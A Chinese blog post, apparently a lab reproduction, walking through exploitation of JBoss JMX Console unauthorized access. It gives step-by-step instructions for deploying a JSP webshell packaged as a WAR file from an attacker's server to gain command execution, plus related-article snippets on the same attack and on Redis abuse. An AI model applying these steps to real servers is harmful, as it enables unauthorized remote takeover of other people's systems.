Jboss历史漏洞利用 - JMX Console 未授权访问漏洞

已于 2023-01-16 16:47:56 修改
阅读量2.5k 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: docker 安全 java web安全 网络
于 2022-12-08 10:31:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44971640/article/details/128232400
版权

文章目录

环境搭建

docker搭建操作指南

docker search testjboss

docker pull testjboss/jboss

docker run -p 8085:8080 -d testjboss/jboss


docker ps 

#查看是否搭建成功

进行访问,出现以下界面即可搭建成功

漏洞简介

Jboss的webUI界面 http://ip:port/jmx-console 未授权访问(或默认密码 admin/admin ),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell

漏洞发现

访问

http://xx.xx.xx.xx/jmx-console/

如果可以直接访问或者通过默认账号密码登录则存在对应漏洞

漏洞利用

远程部署war包

找到 jboss.deployment 选项 (jboss自带的部署功能)中的 flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)

也可以直接输入以下URL进入:

http://ip:port/jmx-console/HtmlAdaptor?
action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL

进入页面后找到 void addURL()

在自己的vps上面部署远程的war木马,让目标机器请求我们的木马文件

jar -cvf shell.war jsp木马文件

python3 -m http.server
#python 开启http服务

在浏览器访问地址,获得war包路径。

然后点击 Invoke 部署

点击 Back to Agent View ,找到 jboss.web.deployment,查看是否上传成功

GET SHELL

访问地址:http://ip:port/cmd/cmd.jsp , 输入木马的访问密码即可拿到服务器权限

防护建议

对jmx-console和web-console界面访问增加强认证。

关闭jmx-console和web-console,提高安全性。
渗透测试小白
关注
专栏目录
漏洞挖掘】——89、JBOSS授权访问利用
Fly_鹏程万里
06-14 79
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用,JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范,默认情况下访问http://ip:8080/jmx-console可以浏览JBoss的部署管理的信息,不需要输入用户名和密码可以直接部署上传木马存在安全隐患。
授权访问漏洞笔记
m0_47599604的博客
04-05 1683
授权访问 介绍 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 B/S架构中 一般存在后台界面中,访问特定目录下的敏感文件,能直接跳过管理员登录,去访问后台管理内容。 C/S架构中 一般存在默认安装的一些客户端应用程序中,安装人员因缺少安全意识导致攻击者利用。 数据库...
Jboss控制台jmx-console安全设置
04-22
Jboss控制台jmx-console安全设置
JBoss安全jmx-console控制台授权访问漏洞
Keep learing, and stay fast
11-02 4632
近期工作用到了jmx-console,顺便整理下JbossJmx-console密码访问相关的知识与配置。 MBean就是一种规范的JavaBean,通过集成和实现一套标准的Bean接口,这种叫MBean,Mbean注册到MBeanServer中。之后将被MBeanServer中注册过的Adapter(比如渲染为HTML的HtmlAdapter)渲染为直观的页面将MBean的属性和方法展示给用户。 MBean -> MBeanServer ...
Jboss ⾼版本JMX Console授权
最新发布
2301_81881972的博客
09-22 294
JMX Console默认存在授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚⾯, 通过部署war包 , getshell。在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下。因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub。Jboss6.x以下。
JMX Console 授权访问漏洞
懂进攻知防守
07-23 5309
JbosswebUI界面http//ipport/jmx-console授权访问(或默认密码admin/admin),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取webshell。
Mycat之Java JMX 授权访问漏洞-关闭Jmx
wayne625的博客
01-23 1335
Mycat 关闭Jmx
jboss--JMX Console授权访问
hovcfuti的博客
10-13 750
然后找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能。若需登录,可以尝试爆破弱口令登录。返回JMX Console里面,刷新找到jboss.web.deployment,如果出现上传的war,则部署成功。
Jboss漏洞(⾼版本JMX Console授权
qq_68186313的博客
08-07 228
JMX Console默认存在授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war包 , getshell。2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏ 远程部署。3、然后输⼊Invoke。
java jmx agent不安全的配置漏洞
weixin_51378457的博客
03-15 4681
APP应该以明示或自愿同意的方式告知用户其需要收集的信息类型、范围、目的、使用方法、储存期限、安全保护措施等信息,并在获得用户授权前明确告知用户数据是否会分享、转让等情况。在搜集用户信息时,需明确具体收集哪些信息,以及收集的目的和用途等。APP应该尊重用户的知情权、选择权、访问权、更正权、删除权、注销权等权益,让用户能够随时查看自己的信息,可以对其进行更正、删除等操作。APP应该合法、公正地收集个人信息,包括在合法法律、法规、规章、标准规定范围内的行为,如经过用户授权同意,且该同意为自愿行为等。
jbaoo4.2.3-jmx-console授权访问.docx
04-10
jbaoo4.2.3-jmx-console授权访问
Jboss漏洞利用总结1
08-03
2. **JMX Console 授权访问 Getshell 漏洞 (CVE-2007-1036)** - 这个漏洞出现在 JBoss 4.x 及以下版本,由于 `/jmx-console/HtmlAdaptor` 路径没有身份验证,攻击者可以直接进入 JMX 控制台执行任意操作。 - ...
JBoss 授权访问和弱口令复现
weixin_53747497的博客
02-21 1468
一个基于J2EE的开放源代码的应用服务器。JBoss 是一个管理 EJB 的容器和服务器,但 JBoss 核心服务不包括支持 servlet/JSP 的WEB容器,一般 与Tomcat或Jetty绑定使用。JbossJava EE 应用服务器(就像Apache是web服务器一样),专门用来 运行Java EE程序的。JBoss Administration Console存在默认账号密码admin/admin,但如果在vulhub上搭建的靶场,那密码就是vulhub。
授权访问漏洞(3)
weixin_66503195的博客
08-05 295
拼接 /trace 获取基本的 HTTP 请求跟踪信息, /env 获取全部环境属性, /health 可探测到站点 git 项目地址。打开后,拼接 /jmx-console 若无需登录,或使用 admin/admin 登录成功则存在漏洞。对目标环境在资源管理器中用以下格式访问...如果该服务器开启了匿名登陆,则可直接进行内容查看。添加ftp站点–>下一步---->分配IP无ssl----->匿名,匿名用户—>完成。虚拟机:windows server 2012。账号密码是admin若可登录,则存在漏洞
【实战】Jboss授权访问JMX-Console)Getshell
cj_Hydra's Blog
11-05 2678
都是重复造轮子,没啥技术含量,只能说以后遇到了知道怎么操作就行。 GO: 访问地址:http://ip/JMX-Console 找到jboss.deployment 进入页面后找到void addURL() 此时部署我们远程的war木马,部署好了以后点击Invoke http:vpsIP地址/soft/cus.war 随后来到URLList中查看Value值是否已经部署好,并且为我们的远程war木马地址 最后点击Apply Changes 后耐心等待一会儿,然后回到JMX-Console目录中 找到
JBOSS授权访问
qq_41788704的博客
10-09 2167
JBOSS主页 # URL后添加 jmx-console/进入控制台,然后进入deployment # jar cvf back.war shell.jsp 将木马打成war包,然后放在公网服务器上,在箭头指向的地方填入war包地址
授权访问漏洞
C233333235的博客
08-04 1125
Redis 默认情况下,会绑定在,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利⽤ Redis ⾃身的提供的config 命令,可以进⾏写⽂件操作,攻击者可以成功将⾃⼰的ssh公钥写⼊⽬标服务器的/root/.ssh ⽂件夹的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试小白

如果您觉得满意,一分一毛也是爱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值